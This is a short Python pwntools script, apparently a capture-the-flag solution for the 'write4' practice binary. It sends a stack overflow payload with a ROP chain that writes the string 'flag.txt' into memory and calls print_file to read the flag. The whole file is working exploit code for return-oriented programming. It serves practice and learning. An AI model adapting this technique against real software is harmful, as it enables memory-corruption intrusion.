20 lines
741 B
Python
Executable File
20 lines
741 B
Python
Executable File
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
prog = process('./write4')
|
|
payload = b''
|
|
for c in range(40):
|
|
payload += b'a'
|
|
|
|
payload += p64(0x0000000000400690) # pop r14, pop r15, ret
|
|
payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
|
|
payload += b"flag.txt" # our string (duh)
|
|
payload += p64(0x0000000000400628) # mov qword ptr [r14], r15 ; ret
|
|
payload += p64(0x0000000000400693) # pop rdi; ret
|
|
payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
|
|
payload += p64(0x0000000000400510) # print_file@plt
|
|
payload += b"\n"
|
|
prog.sendline(payload)
|
|
print(str(prog.recv(), 'UTF-8'))
|
|
prog.close()
|